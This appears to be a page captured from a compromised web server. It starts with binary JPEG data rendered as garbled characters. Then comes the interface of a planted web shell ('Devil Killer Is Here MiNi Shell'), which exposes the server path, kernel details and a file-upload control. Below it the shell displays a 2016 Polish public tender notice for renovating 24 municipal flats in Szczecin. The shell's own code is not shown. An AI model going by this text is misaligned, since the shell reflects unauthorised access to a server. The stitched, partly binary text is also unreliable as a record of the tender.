JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160420/97860-N-2016.html

<p class="kh_header"><b>Szczecin: Wykonanie remontu dwudziestu czterech komunalnych lokali mieszkalnych w Szczecinie, w podziale na siedem części</b><br>
<b>Numer ogłoszenia: 97860 - 2016; data zamieszczenia: 20.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd  Budynków i Lokali  Komunalnych , ul. Mariacka 25, 70-546 Szczecin, woj. zachodniopomorskie, tel. 91 4886333, 91 4886301, faks 91 4893831, 91 4893832.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:/www.zbilk.szczecin.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontu dwudziestu czterech komunalnych lokali mieszkalnych w Szczecinie, w podziale na siedem części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie remontu dwudziestu czterech komunalnych lokali mieszkalnych w Szczecinie, w podziale na siedem części:
1)	Część 1 zamówienia - remont lokali mieszkalnych przy ul. Dąbrówki 3/12; 
ul. Kościelna 27a/2, ul. Lipowa 18/13; ul. Nehringa 29/3;
2)	Część 2 zamówienia - remont lokali mieszkalnych przy ul. Dubois 16/19, 
ul. Druckiego-Lubeckiego 10/1, ul. Nad Odrą 115/5;
3)	Część 3 zamówienia - remont lokali mieszkalnych przy ul. Arkońska 7/2, 
ul. Wyzwolenia 77/24; ul. Żupańskiego 2/27; ul. Żupańskiego 11/24;
4)	Część 4 zamówienia - remont lokalu mieszkalnego przy, ul. Pocztowa 2/9;         ul. Monte Cassino 33/2; ul. Noakowskiego 14/3B;
5)	Część 5 zamówienia - remont lokali mieszkalnych przy ul. Kolumba 7/8, 
ul. Kolumba 10/8, ul. Poniatowskiego 23/3;
6)	Część 6 zamówienia - remont lokali mieszkalnych przy ul. Bogusława 34/7, 
ul. Krzywoustego 65/20; ul. Limanowskiego 3/7;
7)	Część 7 zamówienia - remont lokalu mieszkalnego przy ul. Bogusława 14/12; 
ul. Bogusława 35/7; ul. Bogusława 38/14, ul. Krzywoustego 68/11.

2.	Zakres remontu poszczególnych lokali mieszkalnych:
CZĘŚĆ 1
1)	nr 12 w budynku przy ul. Dąbrówki 3 (powierzchnia użytkowa lokalu - 8,58 m2):
a)	branża budowlana - wymiana stolarki drzwiowej, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, wymiana stolarki okiennej, naprawa WC poza lokalem,
b)	branża elektryczna - wymiana WLZ, wymiana częściowa instalacji i osprzętu, pomiary elektryczne,
c)	branża sanitarna - wymiana zlewozmywaka, montaż wodomierza,

2)	nr 2 w budynku przy ul. Kościelna 27a (powierzchnia użytkowa lokalu - 37,97 m2): 
a) branża budowlana: wymiana stolarki drzwiowej, naprawa posadzki, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, mycie po robotach malarskich, wywóz gruzu
b) branża sanitarna: wymiana kuchenki gazowej, wymiana grzejnika stalowego, baterii, umywalki, ustępu, montaż wkładu kominowego, opinia kominiarska, próba instalacji gazowej,
c) branża elektryczna: wymiana instalacji i osprzętu, wymiana tablicy, wykonanie instalacji wyrównawczej, pomiary, 

3)	nr 13 w budynku przy ul. Lipowa 18 (powierzchnia użytkowa lokalu - 50,15 m2) 
a) branża budowlana:  wymiana stolarki drzwiowej i okiennej, naprawa posadzki, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, montaż czujnika czadu, mycie po robotach malarskich, wywóz gruzu, sprawdzenie i naprawa istniejących pieców,
b) branża sanitarna: wymiana kuchni gazowej, wymiana wodomierza, zlewozmywaka, próba instalacji gazowej,
c) branża elektryczna: wymiana instalacji i osprzętu, wymiana tablic, montaż grzejnika konwektorowego, pomiary.

4)	nr 3 w budynku przy ul. Nehringa 29 (powierzchnia użytkowa lokalu - 45,93 m2) 
a)	branża budowlana - wymiana stolarki okiennej, naprawa posadzki, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, mycie po robotach malarskich, przestawienie pieców kaflowych, wymiana osprzętu w piecach, montaż czujnika czadu, wywóz gruzu, 
b)	branża sanitarna: wymiana kuchni gazowej, wymiana wodomierza, próba instalacji gazowej
c)	branża elektryczna: wymiana instalacji i osprzętu, wymiana tablicy, montaż grzejników konwektorowych, pomiary elektryczne,

CZĘŚĆ 2
1)	nr 19 w budynku przy ul. Dubois 16 (powierzchnia użytkowa lokalu - 8,13 m2) 
a)  branża budowlana: wymiana stolarki drzwiowej, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, mycie po robotach malarskich, wywóz gruzu, wymiana stolarki okiennej, remont WC na klatce schodowej,
b)   branża sanitarna: wymiana zlewu, wymiana ustępu, montaż wodomierza
c)   branża elektryczna: wymiana tablic, pomiary;

2)	nr 1 w budynku przy ul. Druckiego-Lubeckiego 10 (powierzchnia użytkowa lokalu - 21,09 m2):
a)  branża budowlana: licowanie ścian płytkami ceramicznymi, montaż nawiewników, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, mycie po robotach malarskich, wywóz gruzu,
b) branża sanitarna: wymiana kotła gazowego, wymiana kuchni gazowej, opinia kominiarska, wykonanie przewodów spalinowych i wentylacyjnych -wkład kominowy, próba instalacji gazowej, wymiana ustępu, brodzika, zlewozmywaka, umywalki, baterii, montaż wodomierza, wymiana rurociągu C.O., wymiana grzejników stalowych,
c)   branża elektryczna: wymiana gniazd, pomiary.

3)	nr 5 w budynku przy ul. Nad Odrą 115 (powierzchnia użytkowa lokalu - 44,97 m2):
a) branża budowlana: wymiana stolarki drzwiowej, naprawa posadzki, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, przestawienie pieca kaflowego, montaż czujnika czadu, mycie po robotach malarskich, wywóz gruzu, protokół kominiarski
b)   branża sanitarna: wymiana kuchni gazowej, wymiana zlewozmywaka, próba instalacji gazowej
c)  branża elektryczna: wymiana instalacji i osprzętu, wymiana WLZ, wymiana tablic, montaż grzejnika konwektorowego, pomiary elektryczne,
 
CZĘŚĆ 3:
1)	nr 2 w budynku przy ul. Arkońska 7 (powierzchnia użytkowa lokalu - 23,66 m2):
a)  branża budowlana: naprawa posadzki po zalaniu, częściowe dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, mycie po robotach malarskich, wymiana szafki zlewozmywakowej, wywóz gruzu,
 
2)	nr 24 w budynku przy ul. Wyzwolenia 77 (powierzchnia użytkowa lokalu - 35,10 m2):
a)   branża budowlana: wymiana stolarki okiennej, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu,
b)   branża sanitarna: wymiana kuchni gazowej, wymiana kotłów grzewczych gazowych, próba instalacji gazowej, wymiana baterii, zlewozmywaka, ustępu, opinia kominiarska, montaż wodomierza
c)   branża elektryczna: wymiana instalacji i osprzętu, wymiana tablicy, pomiary

3)	nr 27 w budynku przy ul. Żupańskiego 2 (powierzchnia użytkowa lokalu - 36,63 m2):
a)  branża budowlana: przestawienie i postawienie pieca kaflowego, montaż czujnika czadu, montaż nawiewników okiennych, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, wymiana stolarki drzwiowej, naprawa posadzki, wywóz gruzu.
b) branża sanitarna: wymiana kuchni gazowej, próba instalacji gazowej, montaż wodomierza, zlewozmywaka, ustępu,
c)   branża elektryczna: wymiana instalacji i osprzętu, wymiana tablicy, pomiary

4)	nr 24 w budynku przy ul. Żupańskiego 11 (powierzchnia użytkowa lokalu - 39,94 m2):
a)  branża budowlana: przestawienie pieca kaflowego, montaż czujnika czadu, opinia kominiarska, montaż nawiewników okiennych, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu,
b) branża sanitarna: wymiana kuchni gazowej, baterii, montaż zlewozmywaka, wodomierza, próba instalacji gazowej, 
c)  branża elektryczna: wymiana instalacji i osprzętu, wymiana tablicy, montaż grzejników akumulacyjnych, pomiary elektryczne,


CZĘŚĆ 4:
1)	nr 9 w budynku przy ul. Pocztowa 2 (powierzchnia użytkowa lokalu - 42,28 m2):
a)  branża budowlana: dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu, 
b) branża sanitarna: wymiana kotła gazowego, kuchni gazowej, baterii, ustępu, zlewozmywaka, wanny, montaż wodomierza, próba instalacji gazowej, opinia kominiarska,
c)   branża elektryczna: wymiana instalacji i osprzętu, wymiana tablicy, pomiary

2)	nr 2 w budynku przy ul. Monte Cassino 33 (powierzchnia użytkowa lokalu - 16,00 m2):
a) branża budowlana: wymiana drzwi harmonijkowych, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, opinia kominiarska, wywóz gruzu,
b)   branża sanitarna: montaż wodomierza, montaż zlewu żeliwnego, ustępu,
c)   branża elektryczna: wymiana instalacji i osprzętu, wymiana tablicy, pomiary.

3)	nr 3B w budynku przy ul. Noakowskiego 14 (powierzchnia użytkowa lokalu - 51,09 m2): 
a)	branża elektryczna - wymiana instalacji i osprzętu (osprzęt elektryczny zakupi najemca), wymiana tablicy, pomiary,


CZĘŚĆ 5:

1) nr 8 w budynku przy ul. Kolumba 7 (powierzchnia użytkowa lokalu - 70,44 m2):
a)   branza budowlana: wymiana stolarki okiennej, rozbiórka piecy kaflowych, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu, montaż nawiewników okiennych.
b) branża sanitarna: wymiana kuchni gazowej, próba instalacji gazowej, montaż umywalki, zlewozmywaka, ustępu, wanny, baterii, montaż kotła gazowego, grzejników stalowych, opinia kominiarska
c)   branża elektryczna: wymiana instalacji i osprzętu, wymiana tablicy, pomiary

2)	nr 8 w budynku przy ul. Kolumba 10 (powierzchnia użytkowa lokalu - 43,06 m2):
a) branża budowlana: wymiana stolarki okiennej, montaż nawiewników okiennych, naprawa pieca kaflowego, montaż czujnika czadu, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu.
b)  branża sanitarna: montaż kuchni gazowej, montaż wkładu kominowego, opinia kominiarska, montaż umywalki, zlewozmywaka, baterii, próba instalacji gazowej.
c)   branża elektryczna: wymiana instalacji i osprzętu, wymiana tablicy, montaż grzejnika konwektorowego, pomiary.

3)	nr 3 w budynku przy ul. Poniatowskiego 23 (powierzchnia użytkowa lokalu - 75,67 m2):
a)	branża elektryczna - wymiana instalacji i osprzętu (osprzęt elektryczny zakupi najemca), uzupełnienie tablicy, pomiary,

CZĘŚĆ 6:
1)	nr 7 w budynku przy ul. Bogusława 34 (powierzchnia użytkowa lokalu - 27,58 m2):
a)   ranża budowlana: wymiana stolarki okiennej i drzwiowej, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu,
b)   branża sanitarna: wymiana kuchni gazowej,ustępu, zlewozmywaka, kotła gazowego, grzejników stalowych, opinia kominiarska, próba instalacji gazowej, montaż wkładu kominowego
c)   branża elektryczna: wymiana instalacji i osprzętu, wymiana tablicy, pomiary.
 
2)	nr 20 w budynku przy ul. Krzywoustego 65 (powierzchnia użytkowa lokalu - 36,29 m2):
a)  branża budowlana: montaż nawiewników okiennych, wymiana stolarki drzwiowej, przestawienie pieca kaflowego, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu.
b) branża sanitarna: wymiana kuchni gazowej, ustępu, zlewozmywaka, montaż wodomierza, czujnika czadu, próba instalacji gazowej
c)  branża elektryczna: wymiana instalacji i osprzętu, wymiana tablicy, montaż pieca akumulacyjnego, pomiary

3)	nr 7 w budynku przy ul. Limanowskiego 3 (powierzchnia użytkowa lokalu - 36,98 m2)
a)  branża budowlana: montaż nawiewników okiennych, wymiana stolarki drzwiowej, przestawienie pieców kaflowych, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, opinia kominiarska, naprawa posadzki, montaż przewodu wentylacyjnego 
b) branża sanitarna: wymiana kuchni gazowej, ustępu, zlewozmywaka, montaż wodomierza, czujnika czadu, próba instalacji gazowej.
c)   branża elektryczna: wymiana instalacji i osprzętu, wymiana tablicy, pomiary

CZĘŚĆ 7:
1)	nr 12 w budynku przy ul. Bogusława 14 (powierzchnia użytkowa lokalu -  34,12 m2):
a) branża budowlana: wymiana stolarki okiennej, przestawienie pieca kaflowego, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu.
b)  branża sanitarna: wymiana kuchni gazowej, montaż czujnika czadu, zlewozmywaka, ustępu, baterii, montaż wodomierza, próba instalacji gazowej,
c)   branża elektryczna: wymiana instalacji i osprzętu, tablicy, piec akumulacyjny, pomiary 

2)	nr 7 w budynku przy ul. Bogusława 35 (powierzchnia użytkowa lokalu - 37,19 m2):
a)   branża budowlana: wymiana stolarki okiennej, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu,
b) branża sanitarna: wymiana kuchni gazowej, baterii, montaż wodomierza, opinia kominiarska, próba instalacji gazowej,
c)  branża elektryczna: wymiana instalacji i osprzętu, grzałek w piecach kaflowych, grzejnika drabinkowego, pomiary

3)	nr 14 w budynku przy ul. Bogusława 38 (powierzchnia użytkowa lokalu - 43,50 m2):
a) branża budowlana: wymiana stolarki okiennej i drzwiowej, przestawienie pieca kaflowego, naprawa posadzki, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, wywóz gruzu,
b) branża sanitarna: wymiana kuchni gazowej, montaż czujnika czadu, montaż zlewozmywaka, wanny, ustępu, baterii, montaż wodomierza, próba instalacji gazowej,
c)  branża elektryczna: wymiana instalacji i osprzętu, tablicy, pomiary

4)	nr 11 w budynku przy ul. Bogusława 68 (powierzchnia użytkowa lokalu - 7,38 m2):
a)   branża budowlana: wymiana stolarki okiennej, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, wywóz gruzu
b)   branża sanitarna: wymiana zlewozmywaka, montaż wodomierza
c) branża elektryczna: wymiana instalacji i osprzętu, wymiana tablicy, kuchenki elektrycznej dwu palnikowej, pieca akumulacyjnego, pomiary.

3.	Przedmiot zamówienia należy wykonać zgodnie ze Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych, warunkami technicznymi oraz sztuką budowlaną. Roboty należy prowadzić zgodnie z obowiązującymi przepisami bezpieczeństwa i higieny pracy przy wykonywaniu robót budowlanych i przepisami p.poż.
4.	Wykonawca jest wytwarzającym odpady w rozumieniu przepisów ustawy o odpadach z dnia 14 grudnia 2012 r. (Dz. U. z 2013 r., poz. 21). Wykonawca w trakcie realizacji przedmiotu zamówienia ma obowiązek w pierwszej kolejności poddania odpadów budowlanych (odpadów betonowych, ziemi gruzu budowlanego) odzyskowi, a jeżeli z przyczyn technologicznych jest on niemożliwy lub nieuzasadniony z przyczyn ekologicznych lub ekonomicznych, to Wykonawca zobowiązany jest do przekazania powstałych odpadów do unieszkodliwienia. Wykonawca zobowiązany jest udokumentować Zamawiającemu sposób gospodarowania tymi odpadami (utylizacja, wywóz gruzu itp.) jako warunek dokonania odbioru końcowego realizowanego zamówienia.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 85.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wadium należy wnieść w wysokości:
1)	dla Części 1 zamówienia (ul. Dąbrówki 3/12; ul. Kościelna 27a/2, ul. Lipowa 18/13; ul. Nehringa 29/3) - 1 399,00 zł (słownie: jeden tysiąc trzysta dziewięćdziesiąt dziewięć złotych),
2)	dla Części 2 zamówienia (ul. Dubois 16/19, ul. Druckiego-Lubeckiego 10/1,                    ul. Nad Odrą 115/5) - 1 071,00 zł (słownie: jeden tysiąc siedemdziesiąt jeden złotych),
3)	dla Części 3 zamówienia (ul. Arkońska 7/2, ul. Wyzwolenia 77/24; ul. Żupańskiego 2/27; ul. Żupańskiego 11/24) - 1 289,00 zł (słownie: jeden tysiąc dwieście osiemdziesiąt dziewięć złotych),
4)	dla Części 4 zamówienia (ul. Pocztowa 2/9; ul. Monte Cassino 33/2;                              ul. Noakowskiego 14/3B) - 640,00 zł (słownie: sześćset czterdzieści złotych),
5)	dla Części 5 zamówienia (ul. Kolumba 7/8, ul. Kolumba 10/8, ul. Poniatowskiego 23/3)   - 1 202,00 zł (słownie: jeden tysiąc dwieście dwa złote),
6)	dla Części 6 zamówienia (ul. Bogusława 34/7, ul. Krzywoustego 65/20;                            ul. Limanowskiego 3/7) - 1 093,00 zł (słownie: jeden tysiąc dziewięćdziesiąt trzy złote),
7)	dla Części 7 zamówienia (ul. Bogusława 14/12; ul. Bogusława 35/7;                                  ul. Bogusława 38/14, ul. Krzywoustego 68/11) - 1 379,00 zł (słownie: jeden tysiąc trzysta siedemdziesiąt dziewięć złotych),
w terminie do dnia 10.05.2016 r. do godziny 10:00. Decyduje data wpływu środków do zamawiającego.
2.	Wadium może być wnoszone:
1)	w pieniądzu - przelewem na konto w PKOBP nr 36 1020 4795 0000 9302 0292 7648, 
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
     Dokumenty, o których mowa w pkt 2 należy zdeponować w siedzibie ZBiLK przy               ul. Mariackiej 25, pokój nr 9, przed upływem terminu składania ofert.
3.	W przypadku, gdy wykonawca wnosi wadium w formie gwarancji bankowej lub  gwarancji ubezpieczeniowej z treści tych gwarancji musi w szczególności jednoznacznie wynikać:
1)	zobowiązanie gwaranta (banku, zakładu ubezpieczeń) do zapłaty całej kwoty wadium nieodwołalnie i bezwarunkowo na pierwsze żądanie zamawiającego (beneficjenta gwarancji - Gminy Miasto Szczecin) zawierające oświadczenie, że zaistniały okoliczności, o których mowa w  ust. 6 bez potwierdzania tych okoliczności, 
2)	termin obowiązywania gwarancji, który nie może być krótszy niż termin związania ofertą.
4.	Wadium może być wniesione w jednej lub kilku formach</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał  należycie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum jedną najważniejszą robotę budowlaną. Za jedną najważniejszą robotę budowlaną zamawiający uzna, wykonanie minimum jednego remontu lokalu mieszkalnego we wszystkich branżach</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej jedną osobą, posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej.

UWAGA:
Na podstawie art. 104 ustawy z dnia 7 lipca 1994 roku Prawo budowlane (Dz. U. z 2013 r., poz. 1409) osoby, które, przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu i w oparciu o przepisy będące podstawą ich nadania. Ponadto, zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
